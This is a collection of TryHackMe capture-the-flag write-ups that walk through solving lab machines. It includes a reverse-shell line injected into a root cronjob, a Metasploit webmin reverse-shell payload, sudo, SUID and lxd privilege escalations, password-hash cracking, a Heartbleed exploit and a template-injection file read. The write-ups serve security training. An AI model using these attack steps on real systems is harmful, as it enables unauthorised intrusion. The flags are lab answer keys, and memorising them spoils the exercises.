5 | no answer needed
6 |
7 | - Scan the machine, how many ports are open?
8 |
9 | - `scilla port -target `
10 | - `*`
11 |
12 | - What service is running on port 22?
13 |
14 | - `ssh`
15 |
16 | - What service is running on port 80?
17 |
18 | - `http`
19 |
20 | - What is the user.txt flag?
21 |
22 | - Go to `/etc`
23 | - And you find `http:///etc/squid/passwd`
24 | - So you have found something like `username:password`.
25 | - `hash-identifier` and paste the password.
26 | - `echo password > hash`
27 | - `hashcat --force -m 1600 -a 0 hash /home/kali/rockyou.txt`
28 | - `ssh username@` and enter the password.
29 | - It seems a password file...
30 | - `scilla dir -target `
31 | - `/admin/` found!
32 | - Go to admin page and download the archive.tar file.
33 | - `tar -xvf archive.tar`
34 | - This is a [Borg](https://borgbackup.readthedocs.io/en/stable/) things.
35 | - Install borg.
36 | - `borg extract archive.tar::music_archive`
37 | - You found the ssh credentials.
38 | - `ssh ****@` and enter the password.
39 | - `cat user.txt`
40 | - `flag{************************************}`
41 |
42 | - What is the root.txt flag?
43 |
44 | - `sudo -l`
45 | - `cat /etc/mp3backups/backup.sh`
46 | - `sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"`
47 | - `bash -p`
48 | - `cat /root/root.txt`
49 | - `flag{***********************************}`
50 |
--------------------------------------------------------------------------------
/Easy-Peasy/README.md:
--------------------------------------------------------------------------------
1 | # Easy Peasy
2 |
3 | - How many ports are open?
4 |
5 | - `nmap `
6 | - `3`
7 |
8 | - What is the version of nginx?
9 |
10 | - `nmap -sV `
11 | - `1.16.1`
12 |
13 | - What is running on the highest port?
14 |
15 | - `apache`
16 |
17 | - Using GoBuster, find flag 1.
18 |
19 | - `gobuster dir -u http:/// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
20 | - We find `/hidden`.
21 | - Go in depth. `gobuster dir -u http:///hidden/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
22 | - We find `/whatever`
23 | - Inspect page source.
24 | - `ZmxhZ3tmMXJzN19mbDRnfQ==`
25 | - `echo -n ZmxhZ3tmMXJzN19mbDRnfQ== | base64 -d`
26 | - `flag{f1rs7_fl4g}`
27 |
28 | - Further enumerate the machine, what is flag 2?
29 |
30 | - I remember you there is another server public exposed. Go to `http://:65524`.
31 | - With the same previous command of gobuster we can see there is a robots.txt file.
32 | - `a18672860d0510e5ab6699730763b250`
33 | - `hash-identifier`
34 | - Just search on google
35 | - `flag{1m_s3c0nd_fl4g}`
36 |
37 | - Crack the hash with easypeasy.txt, What is the flag 3?
38 |
39 | - Inspect source code of default Apache page.
40 | - `flag{9fdafbd64c47471a8f54cd3fc64cd312}`
41 |
42 | - What is the hidden directory?
43 |
44 | - Looking at the second server (apache) index page source code I found `its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu`.
45 | - Play a bit with CyberChef.
46 | - `/n0th1ng3ls3m4tt3r` (base62).
47 |
48 | - Using the wordlist that provided to you in this task crack the hash
49 | what is the password?
50 |
51 | - Go to this directory with a browser and inspect source code.
52 | - `940d71e8655*********8ab85066**********418**********83e7f5fe6*d81`
53 | - `hash-identifier`
54 | - `john --wordlist=easypeasy.txt --format=gost hash.txt`
55 | - `mypass*************`
56 |
57 | - What is the password to login to the machine via SSH?
58 |
59 | - Download the central image on the page (`http://:65524/n0th1ng3ls3m4tt3r`)
60 | - `steghide extract -sf binarycodepixabay.jpg` and enter the password.
61 | - In the new file you will have a username and a binary password.
62 | - Just convert to text the binary code.
63 | - `***********************binary`
64 |
65 | - What is the user flag?
66 |
67 | - Login into ssh (not port 22, remember the output of nmap).
68 | - `cat user.txt`
69 | - This isn't the real flag. Just use ROT13.
70 | - `flag{n0wi************}`
71 |
72 | - What is the root flag?
73 |
74 | - Try to search something related to cronjob.
75 | - `cat /etc/crontab`
76 | - uuuuuuuuh `/var/www/.mysecretcronjob.sh`
77 | - This code will be executed as root, so:
78 | - Insert this on that file: `/bin/bash -i >& /dev/tcp//4444 0>&1`
79 | - On your machine `nc -lnvp 4444`
80 | - `cat /root/flag.txt` ......
81 | - wat?
82 | - oH. Ok. `cat /root/.root.txt`
83 | - `flag{63a**0e******05079**********1845}`
84 |
85 |
86 |
87 |
88 |
89 |
--------------------------------------------------------------------------------
/Easy-Peasy/binarycodepixabay.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Easy-Peasy/binarycodepixabay.jpg
--------------------------------------------------------------------------------
/Easy-Peasy/hash.txt:
--------------------------------------------------------------------------------
1 | 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81
--------------------------------------------------------------------------------
/Easy-Peasy/secrettext.txt:
--------------------------------------------------------------------------------
1 | username:boring
2 | password:
3 | 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
4 |
--------------------------------------------------------------------------------
/Encryption-Crypto-101/README.md:
--------------------------------------------------------------------------------
1 | # Encryption - Crypto 101
2 |
3 | - I'm ready to learn about encryption
4 |
5 | no answer needed
6 |
7 | - I agree not to complain too much about how theory heavy this room is.
8 |
9 | no answer needed
10 |
11 | - Are SSH keys protected with a passphrase or a password?
12 |
13 | - `passphrase`
14 |
15 | - What does SSH stand for?
16 |
17 | - `secure shell`
18 |
19 | - How do webservers prove their identity?
20 |
21 | - `certificate`
22 |
23 | - What is the main set of standards you need to comply with if you store or process payment card details?
24 |
25 | - `PCI-DSS`
26 |
27 | - What's 30 % 5?
28 |
29 | - `0`
30 |
31 | - What's 25 % 7
32 |
33 | - `4`
34 |
35 | - What's 118613842 % 9091
36 |
37 | - `python3`
38 | - `118613842 % 9091`
39 | - `****`
40 |
41 | - Should you trust DES? Yea/Nay
42 |
43 | - `Nay`
44 |
45 | - What was the result of the attempt to make DES more secure so that it could be used for longer?
46 |
47 | - Google it!
48 |
49 | - Is it ok to share your public key? Yea/Nay
50 |
51 | - `Yea`
52 |
53 | - p = 4391, q = 6659. What is n?
54 |
55 | - `python3`
56 | - `4391 * 6659`
57 | - `********`
58 |
59 | - I understand enough about RSA to move on, and I know where to look to learn more if I want to.
60 |
61 | no answer needed
62 |
63 | - I understand how keys can be established using Public Key (asymmetric) cryptography.
64 |
65 | no answer needed
66 |
67 | - What company is TryHackMe's certificate issued to?
68 |
69 | - In your browser click on the lock icon near to the URL of tryhackme.
70 | - Look at the certificate.
71 | - `**********`
72 |
73 | - I recommend giving this a go yourself. Deploy a VM, like Learn Linux and try to add an SSH key and log in with the private key.
74 |
75 | no answer needed
76 |
77 | - Download the SSH Private Key attached to this room.
78 |
79 | no answer needed
80 |
81 | - What algorithm does the key use?
82 |
83 | - `rsa`
84 |
85 | - Crack the password with John The Ripper and rockyou, what's the passphrase for the key?
86 |
87 | - `python2 /usr/share/john/ssh2john.py idrsa.id_rsa > id_rsa.hash`
88 | - `john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash`
89 | - `*********`
90 |
91 | - I understand how Diffie Hellman Key Exchange works at a basic level
92 |
93 | no answer needed
94 |
95 | - Time to try some GPG. Download the archive attached and extract it somewhere sensible.
96 |
97 | no answer needed
98 |
99 | - You have the private key, and a file encrypted with the public key. Decrypt the file. What's the secret word?
100 |
101 | - `gpg --import tryhackme.key`
102 | - `gpg -d message.gpg`
103 | - `*********`
104 |
105 | - I understand that quantum computers affect the future of encryption. I know where to look if I want to learn more.
106 |
107 | no answer needed
108 |
109 |
110 |
111 |
112 |
113 |
--------------------------------------------------------------------------------
/Erit-Securus-I/README.md:
--------------------------------------------------------------------------------
1 | # Erit Securus I
2 |
3 | - Deploy box
4 |
5 | no answer needed
6 |
7 | - How many ports are open?
8 |
9 | - `scilla port -target `
10 | - `2`
11 |
12 | - What ports are open? Comma separated, lowest first: `**,**`
13 |
14 | - `**,**`
15 |
16 | - What CMS is the website built on?
17 |
18 | - `bolt`
19 |
20 | - In the exploit from 2020-04-05, what language is used to write the exploit?
21 |
22 | - `python`
23 |
24 | - As the exploit is authenticated, you will also need a username and password. Knowing the URI for the login-portal is also critical for the exploit to work. Find the login-portal and try login in.
25 |
26 | no answer needed
27 |
28 | - What is the username of the user running the web server?
29 |
30 | - `www-data`
31 |
32 | - What is the users password?
33 |
34 | - `sqlite3 bolt.db`
35 | - `.tables`
36 | - `select * from bolt_users;`
37 | - `echo '$2y$*****************************************************' > hash`
38 | - `*********`
39 |
40 | - Flag 1
41 |
42 | - `su wileec`
43 | - `cat flag1.txt`
44 | - `********************`
45 |
46 | - User wileec can sudo! What can he sudo?
47 |
48 | - `(*******) NOPASSWD: /usr/bin/***`
49 |
50 | - Flag 2
51 |
52 | - `$ TF=$(mktemp -u)`
53 | - `sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'`
54 | - `sudo rm $TF`
55 | - `SHELL=/bin/bash script -q /dev/null`
56 | - `ls`
57 | - `cat flag2.txt`
58 | - `********************************`
59 |
60 | - What sudo rights does jsmith have?
61 |
62 | - `(ALL : ALL) NOPASSWD: ALL`
63 |
64 | - Flag 3
65 |
66 | - `sudo -s`
67 | - `cd /root/`
68 | - `ls`
69 | - `cat flag3.txt`
70 | - `****************************************`
71 |
--------------------------------------------------------------------------------
/Game-Zone/README.md:
--------------------------------------------------------------------------------
1 | # Game Zone
2 |
3 | - Deploy the machine and access its web server.
4 |
5 | no answer needed
6 |
7 | - What is the name of the large cartoon avatar holding a sniper on the forum?
8 |
9 | - `Agent 47`
10 |
11 | - Here is a potential place of vulnerability, as you can input your username as another SQL query. This will take the query write, place and execute it.
12 |
13 | no answer needed
14 |
15 | - The extra SQL we inputted as our password has changed the above query to break the initial query and proceed (with the admin user) if 1==1, then comment the rest of the query to stop it breaking.
16 |
17 | no answer needed
18 |
19 | - When you've logged in, what page do you get redirected to?
20 |
21 | - `portal.php`
22 |
23 | - In the users table, what is the hashed password?
24 |
25 | - `ab5db915fc9cea6c78df88106c6500c57f2b***************************`
26 |
27 | - What was the username associated with the hashed password?
28 |
29 | - `agent47`
30 |
31 | - What was the other table name?
32 |
33 | - `post`
34 |
35 | - Once you have JohnTheRipper installed you can run it against your hash.
36 |
37 | no answer needed
38 |
39 | - What is the de-hashed password?
40 |
41 | - `video*******`
42 |
43 | - What is the user flag?
44 |
45 | - `ssh agent47@`, `yes` and enter password.
46 | - `pwd`
47 | - `ls`
48 | - `cat user.txt`
49 | - `***********************`
50 |
51 | - How many TCP sockets are running?
52 |
53 | - `5`
54 |
55 | - What is the name of the exposed CMS?
56 |
57 | - `webmin`
58 |
59 | - What is the CMS version?
60 |
61 | - `1.580`
62 |
63 | - What is the root flag?
64 |
65 | - `msfconsole`
66 | - `search webmin 1.580`
67 | - `use 1`
68 | - `set payload cmd/unix/reverse`
69 | - `set PASSWORD ************`
70 | - `set USERNAME agent47`
71 | - `set LHOST `
72 | - `SET RHOSTS 127.0.0.1`
73 | - `SET RPORT 10000`
74 | - `run`
75 | - `pwd`
76 | - `cat /root/root.txt`
77 | - `*************************`
78 |
79 |
80 |
81 |
82 |
--------------------------------------------------------------------------------
/GamingServer/README.md:
--------------------------------------------------------------------------------
1 | # GamingServer
2 |
3 | - What is the user flag?
4 |
5 | - Visit `http://`.
6 | - `scilla port -target -p -1000`
7 | - Two ports open. 22 and 80.
8 | - `scilla dir -target `
9 | ~~~
10 | [+]FOUND: http:///uploads/ 200 OK
11 | [+]FOUND: http:///secret/ 200 OK
12 | ~~~
13 | - Found a dictionary of passwords in uploads (dict.lst) and a RSA private key.
14 | - Save these two files.
15 | - `python2 /usr/share/john/ssh2john.py rsa_priv > id_rsa.hash`
16 | - `john -w dict.lst id_rsa.hash`
17 | - `chmod 600 rsa_priv`
18 | - `ssh john@ -i rsa_priv`. We know the user is john from the website.
19 | - `ls`
20 | - `cat user.txt`
21 | - `*********************************`
22 |
23 | - What is the root flag?
24 |
25 | - john is in the `lxd` group.
26 | - So download the [lxd Alpine Builder](https://github.com/saghul/lxd-alpine-builder).
27 | - `git clone https://github.com/saghul/lxd-alpine-builder.git`
28 | - `cd lxd-alpine-builder`
29 | - `sudo ./build-alpine`
30 | - `python3 -m http.server`
31 | - On target `wget http://:8000/alpine-*****************.tar.gz`
32 | - `lxc image import ./alpine-*****************.tar.gz --alias myimage`
33 | - `lxc init myimage ignite -c security.privileged=true`
34 | - `lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true`
35 | - `lxc start ignite`
36 | - `lxc exec ignite /bin/sh`
37 | - `id`
38 | - `cat /mnt/root/root/root.txt `
39 | - `********************************`
40 |
41 |
42 |
43 |
44 |
45 |
--------------------------------------------------------------------------------
/Geolocating-Images/README.md:
--------------------------------------------------------------------------------
1 | # Geolocating Images
2 |
3 | - Download the zip file
4 |
5 | no answer needed
6 |
7 | - Where in the world is image 1? The answer is the country name.
8 |
9 | - Use [yandex](https://yandex.com/images/search)
10 | - `china`
11 |
12 | - no title
13 |
14 | no answer needed
15 |
16 | - Where was image 2 taken?
17 |
18 | - Search on Google `W Shieffield av. Addison av.`
19 | - You should get a result of Chigaco street.
20 | - Switch to street view.
21 | - `*******************`
22 |
23 | - Read the above material
24 |
25 | no answer needed
26 |
27 | - Where was image 3 taken?
28 |
29 | - Tried with Google dork, maps, shodan, other engines, exiftool, nothing.
30 | - Then I tried with some informations, such as Paris cemetery.. and so on.
31 | - Finally I searched for Paris Observatory.
32 | - `Meudon Observatory`
33 |
34 | - Where is image 4 taken?
35 |
36 | - `Abbey road` :P
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/Geolocating-Images/thm/1.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Geolocating-Images/thm/1.jpeg
--------------------------------------------------------------------------------
/Geolocating-Images/thm/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Geolocating-Images/thm/2.png
--------------------------------------------------------------------------------
/Geolocating-Images/thm/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Geolocating-Images/thm/3.png
--------------------------------------------------------------------------------
/Geolocating-Images/thm/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Geolocating-Images/thm/4.png
--------------------------------------------------------------------------------
/Getting-Started/README.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | - What is the name of the hidden admin page?
4 |
5 | - Inspect page source code
6 | - `/test-admin`
7 |
8 | - What is the username and password in the form username:password?
9 |
10 | - `admin:admin`
11 |
12 | - How many user are signed up to the application?
13 |
14 | - `3`
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/GoldenEye/goldeneye.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/GoldenEye/goldeneye.jpg
--------------------------------------------------------------------------------
/Gotta-Catch'em-All/README.md:
--------------------------------------------------------------------------------
1 | # Gotta Catch'em All!
2 |
3 | - Find the Grass-Type Pokemon
4 |
5 | - `nmap -sV `
6 | - `:` in the source code of the default page...
7 | - `ssh pokemon@` and enter the password
8 | - `cd Desktop`
9 | - `nc -lnvp 1234 < P0kEmOn.zip`
10 | - `nc 1234 > pokemon.zip`
11 | - `unzip pokemon.zip`
12 | - `cd P0kEmOn`
13 | - `cat grass-type.txt`
14 | - `50 6f 4b ** 4d 6f ** ** ** 75 ** 62 ** 73 61 75 ** 7d`
15 | - CyberChef with recipe "From Hex".
16 | - `*******{*********}`
17 |
18 | - Find the Water-Type Pokemon
19 |
20 | - `find / -type f | grep water-type`
21 | - `cat /var/www/html/water-type.txt`
22 | - `**************{********}`
23 | - But this flag has no sense...
24 | - Caesar Cypher? Yes...
25 | - `**************{********}`
26 |
27 | - Find the Fire-Type Pokemon
28 |
29 | - `find / -type f | grep fire-type`
30 | - `cat /etc/why_am_i_here?/fire-type.txt`
31 | - `cat /etc/why_am_i_here?/fire-type.txt | base64 -d`
32 | - `*******{**********}`
33 |
34 | - Who is Root's Favorite Pokemon?
35 |
36 | - `find / -type f | grep root`
37 | - After a lot of lines... `/home/roots-pokemon.txt`
38 | - `cat /home/roots-pokemon.txt`. Permission denied. f+ck.
39 | - After some minutes..
40 | - `pokemon@root:~/Videos/Gotta/Catch/Them/ALL!$ cat Could_this_be_what_Im_looking_for\?.cplusplus`
41 | - `sudo su ash` and enter the password.
42 | - `sudo -l`
43 | - `cat /home/roots-pokemon.txt`
44 | - `********`
45 |
46 | - Congratulations! Thank You So Much For Completing The Pokemon Room!
47 |
48 | no answer needed
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/Hardening-Basics-Part-2/README.md:
--------------------------------------------------------------------------------
1 | # Hardening Basics Part 2
2 |
3 | - Deploy the VM if necessary and let's go!
4 |
5 | no answer needed
6 |
7 | - Which SSH Protocol version is the most secure?
8 |
9 | - `2`
10 |
11 | - This is a random, arbitrary number, used as the session key, that is used to encrypt GPG.
12 |
13 | - `nonce`
14 |
15 | - Yey/Ney - GPG is based off of the OpenGPG standard
16 |
17 | - `yey`
18 |
19 | - What is the command to generate your GPG keys?
20 |
21 | - `gpg --gen-key`
22 |
23 | - What is the command to symmetrically encrypt a file with GPG?
24 |
25 | - `gpg -c`
26 |
27 | - What is the command to asymmetrically encrypt a file with GPG?
28 |
29 | - `gpg -e`
30 |
31 | - What is the command to create SSH keys?
32 |
33 | - `ssh-keygen`
34 |
35 | - Where are ssh keys stored in a user's home directory?
36 |
37 | - `.ssh`
38 |
39 | - What option needs to be set to select the type of key to generate for SSH?
40 |
41 | - `-t`
42 |
43 | - The SSH configuration options presented in this chapter were found in what file (full path)?
44 |
45 | - `/etc/ssh/sshd_config`
46 |
47 | - No questions
48 |
49 | no answer needed
50 |
51 | - No questions
52 |
53 | no answer needed
54 |
55 | - No questions
56 |
57 | no answer needed
58 |
59 | - No questions
60 |
61 | no answer needed
62 |
63 | - No questions
64 |
65 | no answer needed
66 |
67 | - No questions
68 |
69 | no answer needed
70 |
71 | - No questions
72 |
73 | no answer needed
74 |
75 | - No questions
76 |
77 | no answer needed
78 |
79 | - No questions
80 |
81 | no answer needed
82 |
83 | - No questions
84 |
85 | no answer needed
86 |
87 | - Where are the AppArmor profiles located?
88 |
89 | - `/etc/apparmor.d`
90 |
91 | - This directory includes partial profiles to be used in your own custom profiles
92 |
93 | - `abstractions`
94 |
95 | - This punctuation mark is REQUIRED at the end of every rule in a profile
96 |
97 | - `,`
98 |
99 | - This AppArmor mode enforces the profiles but also logs them
100 |
101 | - `audit`
102 |
103 | - This command checks the status of AppArmor
104 |
105 | - `aa-status`
106 |
107 | - No questions
108 |
109 | no answer needed
110 |
111 | - Have fun!
112 |
113 | no answer needed
114 |
--------------------------------------------------------------------------------
/Hashing-Crypto_101/README.md:
--------------------------------------------------------------------------------
1 | # Hashing - Crypto 101
2 |
3 | - Is base64 encryption or encoding?
4 |
5 | - `encoding`
6 |
7 | - What is the output size in bytes of the MD5 hash function?
8 |
9 | - `16`
10 |
11 | - Can you avoid hash collisions? (Yea/Nay)
12 |
13 | - `Nay`
14 |
15 | - If you have an 8 bit hash output, how many possible hashes are there?
16 |
17 | - `256`
18 |
19 | - Crack the hash "d0199f51d2728db6011945145a1b607a" using the rainbow table manually.
20 |
21 | - `basketball`
22 |
23 | - Crack the hash "5b31f93c09ad1d065c0491b764d04933" using online tools
24 |
25 | - Just google it
26 |
27 | - Should you encrypt passwords? Yea/Nay
28 |
29 | - `Nay`
30 |
31 | - How many rounds does sha512crypt ($6$) use by default?
32 |
33 | - `5000`
34 |
35 | - What's the hashcat example hash (from the website) for Citrix Netscaler hashes?
36 |
37 | - [here](https://hashcat.net/wiki/doku.php?id=example_hashes)
38 |
39 | - How long is a Windows NTLM hash, in characters?
40 |
41 | - `32`
42 |
43 | - Crack this hash: $2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG
44 |
45 | - Copy this hash inside a file called `hash`
46 | - `hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt`
47 | - `***********`
48 |
49 | - Crack this hash: 9eb7ee7f551d2f0ac684981bd1f1e2fa4a37590199636753efe614d4db30e8e1
50 |
51 | - `hash-identifier` and paste the hash
52 | - `echo "9eb7ee7f551d2f0ac684981bd1f1e2fa4a37590199636753efe614d4db30e8e1" > hash`
53 | - `john --format=raw-sha256 hash -w /usr/share/wordlists/rockyou.txt`
54 | - `************`
55 |
56 | - Crack this hash: $6$GQXVvW4EuM$ehD6jWiMsfNorxy5SINsgdlxmAEl3.yif0/c3NqzGLa0P.S7KRDYjycw5bnYkF5ZtB8wQy8KnskuWQS3Yr1wQ0
57 |
58 | - Just google it
59 | - `********`
60 |
61 | - Bored of this yet? Crack this hash: b6b0d451bbf6fed658659a9e7e5598fe
62 |
63 | - Just google it
64 | - `*********`
65 |
66 | - What's the SHA1 sum for the amd64 Kali 2019.4 ISO? http://old.kali.org/kali-images/kali-2019.4/
67 |
68 | - http://old.kali.org/kali-images/kali-2019.4/SHA1SUMS
69 | - `**************************`
70 |
71 | - What's the hashcat mode number for HMAC-SHA512 (key = $pass)?
72 |
73 | - `hashcat --help | grep HMAC-SHA512`
74 | - `****`
75 |
76 |
77 |
--------------------------------------------------------------------------------
/HeartBleed/README.md:
--------------------------------------------------------------------------------
1 | # HeartBleed
2 |
3 | - Read above and ensure you have a good understanding of how the Heartbleed vulnerability works.
4 |
5 | no answer needed
6 |
7 | - What is the flag?
8 |
9 | - `searchsploit heartbleed`
10 | - `searchsploit -m 32745`
11 | - `python 32745.py > result.txt`
12 | - `cat result.txt`
13 | - `THM{**************}`
14 |
15 |
16 |
--------------------------------------------------------------------------------
/IMAGES/THMlogo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/IMAGES/THMlogo.png
--------------------------------------------------------------------------------
/Intro-PoC-Scripting/README.md:
--------------------------------------------------------------------------------
1 | # Intro PoC Scripting
2 |
3 | - Please read the introduction description
4 |
5 | no answer needed
6 |
7 | - What is the target's platform and version number?
8 |
9 | - `webmin 1.580`
10 |
11 | - What is the associated CVE for this platform?
12 |
13 | - `CVE-2012-2982`
14 |
15 | - Which file does the vulnerability exist in?
16 |
17 | - `file/show.cgi`
18 |
19 | - What program/command would be the most effective to use in this exploit?
20 |
21 | - `system shell`
22 |
23 | - What's the original disclosure date of this exploit?
24 |
25 | - `September 6 2012`, It's written in the POC.
26 |
27 |
28 | - What HTTP response code do we expect after the initial POST request?
29 |
30 | - `302`
31 |
32 | - What does sid stand for and what is it's purpose?
33 |
34 | - `Session ID, authentication`
35 |
36 | - In the check function, what is it doing to the cookies?
37 |
38 | - `format`
39 |
40 | - In the second request of the check function, what method is piped into the command?
41 |
42 | - `rand_text_alphanumeric`
43 |
44 | - Which HTTP response header allows us to send an authenticated POST request?
45 |
46 | - `Set-Cookie`
47 |
48 | - Which is the correct method for formatting cookies in this example?
49 |
50 | - `any`
51 |
52 | - What data type does the payload need to be?
53 |
54 | - `string`
55 |
56 | - Why do we need to use "bash -c exec" instead of just "bash -i"
57 |
58 | - `replaces current shell process`
59 |
60 | - What is the purpose of "<&1" in the payload function?
61 |
62 | - `redirects socket output stream to bash input stream`
63 |
64 | - Run the program and listen for the shell. What is the /root/root.txt flag?
65 |
66 | - `wget https://raw.githubusercontent.com/cd6629/CVE-2012-2982-Python-PoC/master/web.py`
67 | - Change the IP address inside the file with yours.
68 | - Listen for a shell with `sudo nc -lnvp 53`
69 | - `python3 web.py `
70 | - On the new shell `cat /root/root.txt`
71 | - `THM{****************}`
72 |
73 | - No questions here
74 |
75 | no answer needed
76 |
77 | - Check out some of those links for more reading material.
78 |
79 | no answer needed
80 |
81 |
82 |
83 |
--------------------------------------------------------------------------------
/Intro-to-Python/README.md:
--------------------------------------------------------------------------------
1 | # Intro to Python
2 |
3 | - Section Complete
4 |
5 | no answer needed
6 |
7 | - Section Complete
8 |
9 | no answer needed
10 |
11 | - What is the name of >
12 |
13 | - `greater than`
14 |
15 | - What is the name of !=
16 |
17 | - `not equal to`
18 |
19 | - 1 != 0 will this return true or false (T or F)
20 |
21 | - `T`
22 |
23 | - What is the name of <=
24 |
25 | - `less or equal than`
26 |
27 | - Will this sample code return truee or false
28 |
29 | - `truee`
30 |
31 | - Section Complete
32 |
33 | no answer needed
34 |
35 | - Section Complete
36 |
37 | no answer needed
38 |
39 | - What data type is 13
40 |
41 | - `integer`
42 |
43 | - What data type is "65"
44 |
45 | - `string`
46 |
47 | - What data type is 62.193
48 |
49 | - `float`
50 |
51 | - Section Complete
52 |
53 | no answer needed
54 |
55 | - Section Complete
56 |
57 | no answer needed
58 |
59 | - Section Complete
60 |
61 | no answer needed
62 |
63 | - Section Complete
64 |
65 | no answer needed
66 |
67 | - Section Complete
68 |
69 | no answer needed
70 |
71 | - Section Complete
72 |
73 | no answer needed
74 |
75 | - Section Complete!
76 |
77 | no answer needed
78 |
79 | - Enter the decoded flag to complete the room!
80 |
81 | - `python decode.py`
82 | - `*********************************`
83 |
84 |
85 |
--------------------------------------------------------------------------------
/Intro-to-Python/decode.py:
--------------------------------------------------------------------------------
1 | import base64
2 |
3 | with open("encodedflag.txt", "r") as f:
4 | encoded_flag = f.read()
5 |
6 | for i in range(5):
7 | encoded_flag = base64.b16decode(encoded_flag)
8 |
9 | for i in range(5):
10 | encoded_flag = base64.b32decode(encoded_flag)
11 |
12 | for i in range(5):
13 | encoded_flag = base64.b64decode(encoded_flag)
14 |
15 | print(encoded_flag)
--------------------------------------------------------------------------------
/Intro-to-Windows/README.md:
--------------------------------------------------------------------------------
1 | # Intro to Windows
2 |
3 | - Read a little about Windows history and versions.
4 |
5 | no answer needed
6 |
7 | - When was Windows announced?
8 |
9 | - `November 20 1985`
10 |
11 | - Which is the latest version of Windows?
12 |
13 | - `Windows 10`
14 |
15 | - Which is the latest version of Windows Server?
16 |
17 | - `Windows Server 2019`
18 |
19 | - Read the above.
20 |
21 | no answer needed
22 |
23 | - In which folder are users profiles stored?
24 |
25 | - `Users`
26 |
27 | - Read the above.
28 |
29 | no answer needed
30 |
31 | - Which Active Directory is cloud based?
32 |
33 | - `Azure Active Directory`
34 |
35 | - Which authentication method does not provide data integrity?
36 |
37 | - `NTLM`
38 |
39 | - Authentication method that assings a ticket in order for a user to login?
40 |
41 | - `Kerberos`
42 |
43 | - Which authentication method allow users to access applications with a single login (short name)?
44 |
45 | - `SAML`
46 |
47 | - Authentication method that uses JSON Web Tokens?
48 |
49 | - `OpenID Connect`
50 |
51 | - Read the above.
52 |
53 | no answer needed
54 |
55 | - Read the above.
56 |
57 | no answer needed
58 |
59 | - Which can be considered the most important server?
60 |
61 | - `Domain Controller`
62 |
63 | - Which server can store emails?
64 |
65 | - `Mail Server`
66 |
67 | - Create the users and groups.
68 |
69 | no answer needed
70 |
71 | - Create your first GPO.
72 |
73 | no answer needed
74 |
75 |
76 |
--------------------------------------------------------------------------------
/Introduction-to-Django/README.md:
--------------------------------------------------------------------------------
1 | # Introduction to Django
2 |
3 | - Read the above.
4 |
5 | no answer needed
6 |
7 | - How would we create an app called Forms?
8 |
9 | - `python3 manage.py startapp Forms`
10 |
11 | - How would we run our project to a local network?
12 |
13 | - `python3 manage.py runserver 0.0.0.0:80`
14 |
15 | - Read the above
16 |
17 | no answer needed
18 |
19 | - Flag from GitHub page
20 |
21 | - `THM{**************}`
22 |
23 | - Admin panel flag?
24 |
25 | - Retrieve the `db.sqlite3` file.
26 | - `sqlite3 db.sqlite3`
27 | - `.databases`
28 | - `select * from db.auth_user`
29 | - `THM{************}`
30 |
31 | - User flag?
32 |
33 | - `select * from db.auth_user`
34 | - Go to the PasteBin link
35 | - `hash-identifier`
36 | - Go to [crackstation](https://crackstation.net) and crack the hash
37 | - `su StrangeFox` and crack the hash
38 | - `cat ~/user.txt`
39 | - `THM{************}`
40 |
41 | - Hidden flag?
42 |
43 | - `cd ~/messagebox/messagebox`
44 | - `cat * | grep THM`
45 | - `THM{************}`
46 |
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/Introduction-to-Flask/README.md:
--------------------------------------------------------------------------------
1 | # Introduction to Flask
2 |
3 | - Let's go!
4 |
5 | no answer needed
6 |
7 | - Which environment variable do you need to change in order to run Flask?
8 |
9 | - `FLASK_APP`
10 |
11 | - What's the default deployment port used by Flask?
12 |
13 | - `5000`
14 |
15 | - Is it possible to change that port? (yay/nay)
16 |
17 | - `yay`
18 |
19 | - Does Flask support POST requests? (yay/nay)
20 |
21 | - `yay`
22 |
23 | - What markdown language can you use to make templates for Flask?
24 |
25 | - `html`
26 |
27 | - Awesome!
28 |
29 | no answer needed
30 |
31 | - What's inside /home/flask/flag.txt ?
32 |
33 | - Visit `http://:5000/vuln`
34 | - Now add `?name={{person.password}}`
35 | - Now instead use `{{ get_user_file("/etc/passwd") }}`
36 | - And now try with `http://:5000/vuln?name={{%20get_user_file(%22/home/flask/flag.txt%22)%20}}`
37 | - `THM{**************}`
38 |
39 | - See you in the next room!
40 |
41 | no answer needed
42 |
43 |
44 |
45 |
--------------------------------------------------------------------------------
/Introduction-to-OWASP-ZAP/README.md:
--------------------------------------------------------------------------------
1 | # Introduction to OWASP ZAP
2 |
